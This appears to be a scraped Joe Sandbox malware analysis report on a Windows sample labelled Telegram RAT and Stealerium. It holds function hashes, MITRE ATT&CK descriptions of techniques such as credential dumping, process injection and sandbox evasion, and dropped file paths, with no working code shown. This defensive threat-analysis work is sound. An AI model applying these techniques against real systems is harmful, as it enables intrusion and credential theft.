Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc26f62987bf1a3679bc4693567592b449101fab7741ac209cfbff0b3ac1bbb8
Instruction ID: 37222fff98908e55013d3598ee92d79441f091e19bed2b5fef316efa0f873daf
Opcode Fuzzy Hash: dc26f62987bf1a3679bc4693567592b449101fab7741ac209cfbff0b3ac1bbb8
Instruction Fuzzy Hash: CDE0263490890D0FDB00FB98E8026FAB761FF84344F000479E90CC32C2DB2A6952C391

Function 00007FF848F36D6D Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 110dd01a12260d5c91524520335d591dcba1716e18eb75b6aa2d7f1600268018
Instruction ID: 6443f61197b74b5535a18c656f01c5e746e7c92dcf06d2fbae95ca2da98db8d6
Opcode Fuzzy Hash: 110dd01a12260d5c91524520335d591dcba1716e18eb75b6aa2d7f1600268018
Instruction Fuzzy Hash: F7E0CD36D0C95C9FDB40BB59BC114D9B7A4FB89308F0101ABF45CC3151D6655511C755

Function 00007FF848F47059 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2347ae36e09b22266dc8a66a14c270a43f6538a4adcb079432298378208d0445
Instruction ID: a095987436aed8cdc2a45ab298cc054c36b119b5ef0478e44867f38d644cf72a
Opcode Fuzzy Hash: 2347ae36e09b22266dc8a66a14c270a43f6538a4adcb079432298378208d0445
Instruction Fuzzy Hash: 5CE0D83170C8094FE718BB08D4906F47352DBA4360F10823BC40AD61D5CF5DE4818384

Function 00007FF848F1E15D Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 980f9e9cb2798e72d1751fa96c3ea6fc47615f019064e950dd14f00de8ee570d
Instruction ID: 4868236a170c7919e2912e8aa099b954a2a69a205ebaa5b85247642da1578c0e
Opcode Fuzzy Hash: 980f9e9cb2798e72d1751fa96c3ea6fc47615f019064e950dd14f00de8ee570d
Instruction Fuzzy Hash: E7E0C221F5A80E4DEA40B334281A1FEB266EF84344FC00431D40DC30C3CE1C280102C5

Function 00007FF848F42C3D Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 973c2cbeb349265763de248295fe0b4c74ad6ed1053b70d7a15c0ecad4a751b2
Instruction ID: 4363198aef39b14b5ea82923ce1e58e20035322eda727b95d34f4ce8e4fd6835
Opcode Fuzzy Hash: 973c2cbeb349265763de248295fe0b4c74ad6ed1053b70d7a15c0ecad4a751b2
Instruction Fuzzy Hash: 06E0C221F4A81A0DEA00B374281A1FEB2A2EF85240FC00832D10DC20C7CE2C280101C5

Function 00007FF848F1C39D Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0cf601bbfbd818134978d79d12a15e6bbd70b424c93da0c21d427a5b29c62e
Instruction ID: 08c35bcd6ab5d6d188d1a5d98b11496d6a189d8136121deb36abbd7e919e9f55
Opcode Fuzzy Hash: 5f0cf601bbfbd818134978d79d12a15e6bbd70b424c93da0c21d427a5b29c62e
Instruction Fuzzy Hash: CFE0C721F9A80E4EEA00B374281A2FEB2A2EF88380FC00832E00DC30C3CE2D291102D5

Function 00007FF848F3D65D Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ee0ea64b9e4e44ca6efb52be6ea617344e8ea7c29608ee3021b95d8edaae9a9
Instruction ID: 37ca1ec44d8d3d934b059c35096c9b01fc59bb5349f3df6cb772b5f97cb77556
Opcode Fuzzy Hash: 8ee0ea64b9e4e44ca6efb52be6ea617344e8ea7c29608ee3021b95d8edaae9a9
Instruction Fuzzy Hash: 31E0C221F5A81E4DEA40B334282A1FEB262EF88244FC00432E40DC20C3DE2C25010295

Function 00007FF848F3F21B Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b302db4b1fb2dfc7fad518a4a8d11fa56ca6a36488abeda874a9e4c40aa0654e
Instruction ID: 84eead48f2176db2751c58d0daf5bfca8e27376686c4a673d57d03d1c8bdd9b5
Opcode Fuzzy Hash: b302db4b1fb2dfc7fad518a4a8d11fa56ca6a36488abeda874a9e4c40aa0654e
Instruction Fuzzy Hash: BDD0A7322089210EFA4C620AB6503B832C0EB443E6F80003BE449C90C1CB1CD7C553A6

Function 00007FF848F1C2EE Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37dcd1153dd817b197ce008454eddff78e6643d0e9b7b4522f9975b91d45ee9c
Instruction ID: 450923208cf4031ad6ee4d99b8a14c9c178a0a54f850ffd93916952485644400
Opcode Fuzzy Hash: 37dcd1153dd817b197ce008454eddff78e6643d0e9b7b4522f9975b91d45ee9c
Instruction Fuzzy Hash: A0E0EC7146CB499FC344EF18E4418DAB7E0FF94364F844B2EF09A821A5DB6896458786

Function 00007FF848F42B8E Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5eedf152b29f6714ca49b8059f5f4edceb47b7acca55d61885d80d4573e959
Instruction ID: a4c0de284e6665b399d2813875d505644593e9e8935a29bb0d28aff72f4489dc
Opcode Fuzzy Hash: 2e5eedf152b29f6714ca49b8059f5f4edceb47b7acca55d61885d80d4573e959
Instruction Fuzzy Hash: 9FE0EC7146CB499FC344EB18E4418DAB7E0FF98360F800B2EF09A821A5DB6892458686

Function 00007FF848F1F6CD Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f4b241f1fcdbe12e1f18beb37ca2ecbbe24694e9939fe3a7e185117f852f1a4
Instruction ID: 2b3cc306387a84b579c228fc08204ec5ab8c7861e9109ec32106c91b6970f2d9
Opcode Fuzzy Hash: 1f4b241f1fcdbe12e1f18beb37ca2ecbbe24694e9939fe3a7e185117f852f1a4
Instruction Fuzzy Hash: 32D05E32B14C094BD384F67D881922932C3DF8A374B14C374A83DC36D5DD249C421312

Function 00007FF848F371E8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c06e1d162bf046f1281fc6d5beadc4cbaf31e053afc4a8622aab0b1eb2044326
Instruction ID: 5e679761d3e2fe2811413acaf6c728c9f573ad3c0650a397bcf1f71faaec9c40
Opcode Fuzzy Hash: c06e1d162bf046f1281fc6d5beadc4cbaf31e053afc4a8622aab0b1eb2044326
Instruction Fuzzy Hash: 18D0C930A699064BD608B76C9882420F3D0FB49740B9446B0E409C73C6EA28F891868A

Function 00007FF848F32097 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 661426247b257dd9de404c6012371af888b14815631ef2f931ce40529154e3d5
Instruction ID: 1e1c415afd9239f297f3762c70008b7bfa61a2103b1a62f2c15d80d254e7db2a
Opcode Fuzzy Hash: 661426247b257dd9de404c6012371af888b14815631ef2f931ce40529154e3d5
Instruction Fuzzy Hash: 5FC080B3E0D44F5AF988766474055F67391DFD06D1F8C4177E409C10DADF2D7886854A

Function 00007FF848F1E0B7 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38068ba02f791ef843d98ee0fd3385b683df00b794f0ac8be14fb3a588332b93
Instruction ID: e9fbc0c673374033b63fc4682ea98884244da374c0563e32026d982d9dc1d26d
Opcode Fuzzy Hash: 38068ba02f791ef843d98ee0fd3385b683df00b794f0ac8be14fb3a588332b93
Instruction Fuzzy Hash: F9D05E3240CB0A4BC308EB14E4004DAB7A0FF98364F400B7EE0AE921E5DF689781CA86

Function 00007FF848F1402B Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a1f886ad6cf56160de2f26b233f61cdb59426495fcc3dcca3ee906867674bd
Instruction ID: 5ed16fd25326de62de58733fcce626bc855784eb94e8a1a11cdfb9fae821e984
Opcode Fuzzy Hash: 20a1f886ad6cf56160de2f26b233f61cdb59426495fcc3dcca3ee906867674bd
Instruction Fuzzy Hash: DCD01232E4980D8E9F50FF58A4426EDF7A0EF55761F440033D108D3141DE1554814780

Function 00007FF848F10F40 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40d91704bd74225cc6655b78a11ec9ddb800d5fb708f754e8caef134724437b
Instruction ID: b6560c28157cefff505d0a45fdb6d9716d436f552dbed9fe11cb3491f279b8c7
Opcode Fuzzy Hash: c40d91704bd74225cc6655b78a11ec9ddb800d5fb708f754e8caef134724437b
Instruction Fuzzy Hash: 94D0C924E198154EE9D9F378888336831D1AF85380F840478F44ECA2D6DD8DACA18756

Function 00007FF848F1BA13 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 831be19a414433e9589b2a8a411f431efc6b32fe5ded055cd29758e51b3dfce6
Instruction ID: 27967e8039bbd1a63c162480613d35456c0883098a3127974c6e6bf592ca01a0
Opcode Fuzzy Hash: 831be19a414433e9589b2a8a411f431efc6b32fe5ded055cd29758e51b3dfce6
Instruction Fuzzy Hash: 49C0123245C6099AD701E710E4418EB73A0EF94354F480B39E08E510A5DD5967958781

Function 00007FF848F202A3 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb5f6d8b39419493bbc1734c5504e4b4e6ad13de4e3c1848fed8f89eaabcdcc1
Instruction ID: 17cffd3315cdb712d2c4e054161a13d7b34afacd3b93830b80400e16499abd93
Opcode Fuzzy Hash: cb5f6d8b39419493bbc1734c5504e4b4e6ad13de4e3c1848fed8f89eaabcdcc1
Instruction Fuzzy Hash: 01C0123244C5495AD745F710E4418EBB760DFA0790F801A79F047410AADD58A6C58685

Function 00007FF848F2063F Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e495ce2959d2ca833186236304d8ae80fdc3b45b1ebf20eb1c2184cb6bf4d7a
Instruction ID: a10356155c2314dfd7174358e6b4e73491e62338f76df31cf2a5aab2fad05907
Opcode Fuzzy Hash: 7e495ce2959d2ca833186236304d8ae80fdc3b45b1ebf20eb1c2184cb6bf4d7a
Instruction Fuzzy Hash: C9C04C33F5E41A5DDB50734474019FD7310DBE4691F500032EA1A814C1CE1A25155985

Function 00007FF848F532D8 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8fbebb56c7160f6b232fda2f3123ea4cc31fdfeff5bc445c2b2abe8df27ce59
Instruction ID: 9819863f8f266807bf86fa6c96f46e89624f9ba747f313463c53db89baf4b73c
Opcode Fuzzy Hash: c8fbebb56c7160f6b232fda2f3123ea4cc31fdfeff5bc445c2b2abe8df27ce59
Instruction Fuzzy Hash: 7490023141B11195D281657464111D63270AF0125CB184276D4484C053AA1D14414558

Function 00007FF848F22535 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6e7892be41baab6b8957aa059ddbae81b49bcca813d98f6dbf74379dce0b45e
Instruction ID: ed4471d374a9b33db584b78c1b01e691b2943b6ccfc8205fd929c0096813ccb5
Opcode Fuzzy Hash: e6e7892be41baab6b8957aa059ddbae81b49bcca813d98f6dbf74379dce0b45e
Instruction Fuzzy Hash:

Function 00007FF848F22548 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf803a6b535e7efc5c093b2fefd516451f4382d21cf5f9d6e8fe9e95927c1ea7
Instruction ID: 148cf76f2475946d3762d26d04e6fc2d7e63bf3ef0636521a8950d358110b17c
Opcode Fuzzy Hash: bf803a6b535e7efc5c093b2fefd516451f4382d21cf5f9d6e8fe9e95927c1ea7
Instruction Fuzzy Hash:

Function 00007FF848F528D0 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7135f7527fe2ef6e97aa2a7d58106781e15828e9db82a6646e394f83eebdd8d1
Instruction ID: 4ae8319826f3ff67a7a96b934c765ead93078333ea7dd1b51249266a282d5053
Opcode Fuzzy Hash: 7135f7527fe2ef6e97aa2a7d58106781e15828e9db82a6646e394f83eebdd8d1
Instruction Fuzzy Hash:

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report uyz4YPUyc9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Stealerium

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\60a8b791-48db-4e1c-8ae7-cc6b3e8030df.bat

C:\Users\user\AppData\Local\Temp\tmp2097.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp20C7.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpCCC0.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpCCD1.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpCCF1.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpCD12.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpE283.tmp.dat

